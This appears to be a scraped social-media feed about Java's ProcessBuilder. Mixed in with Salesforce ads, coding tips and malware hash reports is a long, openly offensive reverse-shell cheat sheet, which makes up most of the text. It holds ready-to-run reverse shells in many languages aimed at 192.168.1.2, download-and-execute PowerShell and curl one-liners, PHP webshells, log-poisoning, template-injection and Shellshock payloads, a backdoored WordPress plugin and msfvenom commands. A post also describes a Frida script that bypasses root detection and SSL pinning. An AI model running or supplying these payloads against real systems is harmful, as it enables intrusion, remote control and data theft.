Both hashes now show THOR YARA match EXPL_SUSP_JS_POC_Dec25 on VT, tied to CVE-2025-55182 (React Server RCE PoC indicators, disclosed Dec ’25) • File 7: c026d2ae1d2439cc7200d0085b955cb0b8a53a80bf9c9585daac129041c4e716 🔗 virustotal.com/gui/file/c026… • File 8: 8a333b62d5c4580137ccd33ebbecb65b6fae4c45c78007c3becdef6beb95e067 🔗 virustotal.com/gui/file/8a33… Observed: Blobs in IndexedDB post-Seller login (reproduced multi-browser/machine). Older YARA hits also present (Bash combo, Java ProcessBuilder, Linux indicators, etc.) VT comments attached.
2
181
Replying to @the_nimoh
class check_sitonmyface {
    public static void main(String[] args) throws Exception {
        var check = new ProcessBuilder("def fine_girl_reactivate()").start();
        if (check.waitFor() == 0) System.out.println("sitonmyface");
    }
}
3
17
9,074
Replying to @Tech_girlll
class check_perfect_match {
    public static void main(String[] args) throws Exception {
        var check = new ProcessBuilder("def fine_girl_reactivate()").start();
        if (check.waitFor() == 0) System.out.println("perfect match");
    }
}
3
1
3
264
🚨 Still using Workflow Rules or Process Builder in Salesforce? Don’t wait for things to break. Future-proof your Salesforce setup now. 👉 xccelerance.com/still-using-… #Salesforce #SalesforceFlow #WorkflowRules #ProcessBuilder #SalesforceMigration #CRM #DigitalTransformation
1
2
16
29 Mar 2025
A while back I mass-produced ProcessBuilders inside a Stream and launched JVMs like crazy; the PC fan started gasping and processing became ridiculously slow. But even when I keep the thread count fairly modest there is still about 500 ms of latency. Is that just how it is?
4
233
Workflow vs. Process Builder ⚡Workflow Rules vs. Process Builder – Which one to use?⚡ ✔️Workflow Rules – Best for simple automations (email alerts, field updates) ✔️Process Builder – More advanced logic with multiple actions #SalesforceAutomation #WorkflowRules #ProcessBuilder
4
5
11
This Frida script bypasses root detection, SSL pinning, and emulator detection in Android apps. It disables SSL certificate validation using multiple techniques, including custom X509TrustManager, OkHttp CertificatePinner bypass, TrustKit pinning, and WebViewClient SSL handling. For root detection bypass, it hooks system calls (fopen, access), modifies system properties, intercepts shell commands, alters Runtime.exec, filters ProcessBuilder, and prevents detection of root-related files and packages. It blocks checks for 35 root files and 25 root-related packages. The emulator detection bypass spoofs Build properties, telephony info, and hardware details, preventing detection through system and CPU checks. Further improvements will enhance CPU and telephony-based detection bypass. The script caches results for performance, making it a powerful tool for security research.
Thank you very much. I have now enhanced and optimized the code with multiple SSL bypasses, emulator and root checks.
2
1
9
936
Hey everyone, I have updated the code:
1. SSL/Certificate Pinning Bypass
Bypasses SSL certificate validation and pinning through multiple methods:
- Custom X509TrustManager implementation
- OkHttp CertificatePinner bypass
- TrustKit pinning bypass
- WebViewClient SSL error handler
- Certificate pinning exception handling
2. Root Detection Bypass:
Comprehensive root detection bypass through:
- Native file operation hooks (fopen, access)
- System property checks
- Shell command interception
- Runtime.exec modifications
- File existence checks
- ProcessBuilder command filtering
- Build property modifications
- Package manager checks
- BufferedReader modifications
- Secure hardware attestation
3. Emulator Detection Bypass:
Bypasses common emulator detection methods:
- Build property modifications
- Telephony information spoofing
- Emulator-specific file checks
- CPU information modification
- System property checks
- Package detection prevention
This Frida script bypasses root detection and SSL pinning in Android apps by blocking root checks, hiding root management tools, and overriding SSL/TLS trust settings to intercept encrypted traffic. github.com/0xCD4/SSL-bypass
2
12
693
🚀 Java Tip 🚀 Java's Process API provides better control over operating system processes. ProcessBuilder pb = new ProcessBuilder("app.exe"); Process process = pb.start(); docs.oracle.com/en/java/java… #Java

1
21
672
In the end, my result was also that ProcessBuilder is faster lol
1
3
200
Unfortunately :( The server blocked our attempts at directly invoking a system command, or even when `.execute()` was detected. Even ProcessBuilder was blocked. Now we needed a workaround, or no P1/Exceptional. Fortunately, with the help of internet lords and chatGPT...
1
1
8
1,179
Collection of Offensive Reverse Shell Guides. ⅌ ███████████████████ Bash Reverse Shells TCP Reverse Shell bash sh -i >& /dev/tcp/192.168.1.2/443 0>&1 /bin/sh -i >& /dev/tcp/192.168.1.2/443 0>&1 bash -i >& /dev/tcp/192.168.1.2/443 0>&1 /bin/bash -i >& /dev/tcp/192.168.1.2/443 0>&1 Alternative Methods Using File Descriptors bash 0<&196;exec 196<>/dev/tcp/192.168.1.2/443; sh <&196 >&196 2>&196 0<&196;exec 196<>/dev/tcp/192.168.1.2/443; /bin/sh <&196 >&196 2>&196 0<&196;exec 196<>/dev/tcp/192.168.1.2/443; bash <&196 >&196 2>&196 0<&196;exec 196<>/dev/tcp/192.168.1.2/443; /bin/bash <&196 >&196 2>&196 Using read and exec bash exec 5<>/dev/tcp/192.168.1.2/443; cat <&5 | while read line; do $line 2>&5 >&5; done sh -i 5<> /dev/tcp/192.168.1.2/443 0<&5 1>&5 2>&5 /bin/sh -i 5<> /dev/tcp/192.168.1.2/443 0<&5 1>&5 2>&5 bash -i 5<> /dev/tcp/192.168.1.2/443 0<&5 1>&5 2>&5 /bin/bash -i 5<> /dev/tcp/192.168.1.2/443 0<&5 1>&5 2>&5 Using -c bash bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1' Basic URL encode bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1' Full URL encode bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1' UDP Reverse Shell bash sh -i >& /dev/udp/192.168.1.2/443 0>&1 /bin/sh -i >& /dev/udp/192.168.1.2/443 0>&1 bash -i >& /dev/udp/192.168.1.2/443 0>&1 /bin/bash -i >& /dev/udp/192.168.1.2/443 0>&1 Netcat Reverse Shells Netcat Linux Using -e bash nc 192.168.1.2 443 -e sh nc 192.168.1.2 443 -e /bin/sh nc 192.168.1.2 443 -e bash nc 192.168.1.2 443 -e /bin/bash Using -c bash nc -c sh 192.168.1.2 443 nc -c /bin/sh 192.168.1.2 443 nc -c bash 192.168.1.2 443 nc -c /bin/bash 192.168.1.2 443 Without -e or -c bash mknod /tmp/backpipe p /bin/sh 0</tmp/backpipe | nc 192.168.1.2 443 1>/tmp/backpipe Using FIFO bash rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 192.168.1.2 443 >/tmp/f rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.2 443 >/tmp/f rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc 192.168.1.2 443 >/tmp/f rm /tmp/f; mkfifo 
/tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.1.2 443 >/tmp/f URL encode rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 443 >/tmp/f Base64 **Attacker:** bash base64 -w 0 <<< 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 443 >/tmp/f' **Output:** plaintext cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK **Victim:** bash echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK' | base64 -d | sh **Or using a URL:** plaintext http://192.168.1.3/cmd.php?cmd=echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK' | base64 -d | sh Netcat Windows bash nc.exe -e cmd 192.168.1.2 443 **SMB server:** bash cp $(locate nc.exe) . && impacket-smbserver a $(pwd) -smb2support \\192.168.1.2\a\nc.exe -e cmd 192.168.1.2 443 BusyBox Reverse Shell bash busybox nc 192.168.1.2 443 -e sh busybox nc 192.168.1.2 443 -e /bin/sh busybox nc 192.168.1.2 443 -e bash busybox nc 192.168.1.2 443 -e /bin/bash No space busybox${IFS}nc${IFS}192.168.1.2${IFS}443${IFS}-e${IFS}sh cURL Reverse Shell **Attacker:** bash echo "nc -e /bin/sh 192.168.1.2 443" > index.html && python3 -m http.server 80 nc -lvnp 443 **Victim:** plaintext http://192.168.1.3/cmd.php?cmd=curl 192.168.1.2/index.html|sh Wget Reverse Shell **Attacker:** bash echo "nc -e /bin/sh 192.168.1.2 443" > index.html && python3 -m http.server 80 nc -lvnp 443 **Victim:** plaintext http://192.168.1.3/cmd.php?cmd=wget -qO- 192.168.1.2/index.html|sh Node-RED Reverse Shell json [{"id":"7235b2e6.4cdb9c","type":"tab","label":"Flow 1"},{"id":"d03f1ac0.886c28","type":"tcp out","z":"7235b2e6.4cdb9c","host":"","port":"","beserver":"reply","base 64":false,"end":false,"name":"","x":786,"y":350,"wires":[]},{"id":"c14a4b00.271d28","type":"tcp 
in","z":"7235b2e6.4cdb9c","name":"","server":"client","host":"192.168.1.2","port":"443","datamode":"stream","datatype":"buffer","newline":"","topic":"","base64":false,"x":281,"y":337,"wires":[["4750d7cd.3c6e88"]]},{"id":"4750d7cd.3c6e88","type":"exec","z":"7235b2e6.4cdb9c","command":"","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":517,"y":362.5,"wires":[["d03f1ac0.886c28"],["d03f1ac0.886c28"],["d03f1ac0.886c28"]]}] WebShells Exif Data WebShell bash exiftool -Comment='<?php system($_GET['cmd']); ?>' filename.png mv filename.png filename.php.png ASP WebShell asp <%response.write CreateObject("WScript{.}Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%> PHP WebShell Chain Filter php php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.U
TF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert{.}iconv{.}PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert{.}iconv{.}PT.UTF32|co
nvert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert 
.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&cmd=id GET php <?=$_GET[cmd]?> <?php system($_GET['cmd']); ?> <?php passthru($_GET['cmd']); ?> <?php echo exec($_GET['cmd']); ?> <?php system($_REQUEST['cmd']); ?> <?php echo shell_exec($_GET['cmd']); ?> <pre><?php system($_GET['cmd']); ?></pre> <pre><h1><?php system($_GET['cmd']); ?></h1></pre> <?php echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>"; ?> POST php <?php system($_POST['cmd']); ?> Log Poisoning WebShell Log Poisoning SSH plaintext > /var/log/auth.log ssh '<?php system($_GET["cmd"]); ?>'@192.168.1.2 plaintext > /var/log/auth.log&cmd=id Log Poisoning FTP plaintext > /var/log/vsftpd.log root@kali:~ ftp 192.168.1.3 Connected to 192.168.1.3. 220 (vsFTPd 3.0.3) Name (192.168.1.2:kali): <?php system($_GET['cmd']); ?> 331 Please specify the password. Password: <?php system($_GET['cmd']); ?> 530 Login incorrect. Login failed. 
ftp> plaintext > /var/log/vsftpd.log&cmd=id Log Poisoning HTTP plaintext > /var/log/apache2/access.log > /var/log/nginx/access.log curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://192.168.1.2" plaintext User-Agent: <?php system($_GET['cmd']); ?> plaintext > /var/log/apache2/access.log&cmd=id > /var/log/nginx/access.log&cmd=id Server Side Template Injection python {{request.application.__globals__.__builtins__.__import__('os').popen('nc -e /bin/sh 192.168.1.2 443').read()}} python {{''.__class__.__mro__[1].__subclasses__()[373]("bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'",shell=True,stdout=-1).communicate()[0].strip()}} python {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket{.}AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess{.}call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %} python {% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.1.2/443 0>&1"')}} python {% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.1.2/443 0>&1"')}} UnrealIRCd bash echo "AB; nc -e /bin/sh 192.168.1.2 443" | nc 192.168.1.3 6697 Exif Data Reverse Shell bash exiftool -Comment='<?php system("nc -e /bin/bash 192.168.1.2 443"); ?>' filename.png mv filename.png filename.php.png Shellshock Shellshock SSH bash ssh user@192.168.1.3 '() { :;}; nc 192.168.1.2 443 -e /bin/bash' ssh user@192.168.1.3 -i id_rsa '() { :;}; nc 192.168.1.2 443 -e /bin/bash' Shellshock HTTP bash curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/192.168.1.2/443 0>&1' http://192.168.1.3/cgi-bin/test.sh curl -H "User-Agent: () { :; }; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.sh" curl -H "User-Agent: () { :; }; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 
0>&1'" "http://192.168.1.3/cgi-bin/evil.cgi" bash curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.sh" curl -H "User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.sh" curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.cgi" curl -H "User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.cgi" CMS Reverse Shells WordPress Plugin Reverse Shell Create Plugin (Reverse Shell) bash touch plugin.php nano plugin.php Plugin Content php <?php /** * Plugin Name: Shelly * Plugin URI: http://localhost * Description: Love Shelly * Version: 1.0 * Author: d4t4s3c * Author URI: https://github{.}com/d4t4s3c */ exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'"); ?> Compress Plugin bash zip plugin{.}zip plugin.php Installation Steps - Plugins - Add New - Upload Plugin - Install Now - Activate Plugin October CMS php function onstart(){ exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'"); } Jenkins Reverse Shells Jenkins Windows **Netcat (Method 1):** bash cmd = "\\\\192.168.1.2\\a\\nc.exe -e cmd 192.168.1.2 443" cmd.execute().text **Netcat (Method 2):** bash println "\\\\192.168.1.2\\a\\nc.exe -e cmd 192.168.1.2 443".execute().text **CMD:** java String host="192.168.1.2"; int port=443; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()){ while(pi.available()>0)so.write(pi{.}read()); while(pe.available()>0)so.write(pe{.}read()); while(si.available()>0)po.write(si{.}read()); so.flush();po.flush(); Thread.sleep(50); try 
{p.exitValue();break;}catch (Exception e){} } p.destroy();s.close(); **PowerShell:** powershell command = "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2:8000/reverse.ps1')" println(command.execute().text) Jenkins Linux **Netcat (Method 1):** bash cmd = "nc -e /bin/sh 192.168.1.10 443" cmd.execute().text **Netcat (Method 2):** bash "nc -e /bin/sh 192.168.1.2 443".execute().text **Bash:** java String host="192.168.1.2"; int port=443; String cmd="bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()){ while(pi.available()>0)so.write(pi{.}read()); while(pe.available()>0)so.write(pe{.}read()); while(si.available()>0)po.write(si{.}read()); so.flush();po.flush(); Thread.sleep(50); try {p.exitValue();break;}catch (Exception e){} } p.destroy();s.close(); Perl Reverse Shell perl perl -e 'use Socket;$i="192.168.1.2";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S"); exec("/bin/sh -i");};' Python Reverse Shell Python 2.x **Sh:** python export RHOST="192.168.1.2";export RPORT=443; python -c 'import sys,socket,os,pty; s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")' **Bash:** python export RHOST="192.168.1.2";export RPORT=443; python -c 'import sys,socket,os,pty; s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' **Generic:** python python -c 'import socket,subprocess,os; s=socket.socket(socket{.}AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.2",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); import pty; pty.spawn("bash")' Python 
3.x **Sh:** python export RHOST="192.168.1.2";export RPORT=443; python3 -c 'import sys,socket,os,pty; s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")' **Bash:** python export RHOST="192.168.1.2";export RPORT=443; python3 -c 'import sys,socket,os,pty; s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' **Generic:** python python3 -c 'import socket,subprocess,os; s=socket.socket(socket{.}AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.2",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); import pty; pty.spawn("/bin/bash")' PHP Reverse Shell php <?php exec("nc -e /bin/sh 192.168.1.2 443"); ?> <?php passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 443 >/tmp/f"); ?> php -r '$sock=fsockopen("192.168.1.2",443);/bin/sh -i <&3 >&3 2>&3;' php -r '$sock=fsockopen("192.168.1.2",443);exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("192.168.1.2",443);system("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("192.168.1.2",443);passthru("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("192.168.1.2",443);popen("/bin/sh -i <&3 >&3 2>&3", "r");' php -r '$sock=fsockopen("192.168.1.2",443);shell_exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("192.168.1.2",443);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' Ruby Reverse Shell ruby ruby -rsocket -e'f=TCPSocket{.}open("192.168.1.2",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ruby -rsocket -e 'exit if fork;c=TCPSocket{.}new("192.168.1.2","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io{.}read}end' ruby -rsocket -e 'c=TCPSocket{.}new("192.168.1.2","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io{.}read}end' Xterm Reverse Shell bash xterm -display 192.168.1.2:443 Ncat Reverse Shell TCP bash ncat 192.168.1.2 443 -e /bin/sh ncat 
192.168.1.2 443 -e /bin/bash UDP bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 192.168.1.2 443 >/tmp/f Socat Reverse Shell bash socat TCP:192.168.1.2:443 EXEC:sh socat TCP:192.168.1.2:443 EXEC:'bash -li',pty,stderr,setsid,sigint,sane PowerShell Reverse Shell powershell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System{.}Net.Sockets.TCPClient("192.168.1.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream{.}Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback "PS " (pwd).Path "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback 'PS ' (pwd).Path '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" powershell powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2:8000/reverse.ps1') powershell C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.2/shell.ps1') powershell powershell -c "IEX(New-Object System{.}Net.WebClient).DownloadString('http://192.168.1.2/powercat.ps1');powercat -c 192.168.1.2 -p 443 -e cmd" Awk Reverse Shell bash awk 'BEGIN {s = "/inet/tcp/0/192.168.1.2/443"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null Gawk 
Reverse Shell bash gawk 'BEGIN {P=443;S="> ";H="192.168.1.2";V="/inet/tcp/0/"H"/"P;while(1){do{printf S|&V;V|&getline c;if(c){while((c|&getline)>0)print $0|&V;close(c)}}while(c!="exit")close(V)}}' Golang Reverse Shell bash echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.1.2:443");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c cmd{.}Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go Telnet Reverse Shell bash rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.2 443 0/tmp/p telnet 192.168.1.2 80 | /bin/bash | telnet 192.168.1.2 443 mknod a p && telnet 192.168.1.2 443 0<a | /bin/sh 1>a TF=$(mktemp -u);mkfifo && telnet 192.168.1.2 443 0<$TF | sh 1>$TF Java Reverse Shell java r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.1.2/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() Node.js Reverse Shell js require('child_process').exec('bash -i >& /dev/tcp/192.168.1.2/443 0>&1'); Msfvenom Reverse Shells Web Payloads PHP Payload bash msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw > reverse.php msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=443 -f raw > reverse.php WAR Payload bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f war > reverse.war JAR Payload bash msfvenom -p java/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f jar > reverse.jar JSP Payload bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw > reverse.jsp ASPX Payload bash msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx msfvenom -p 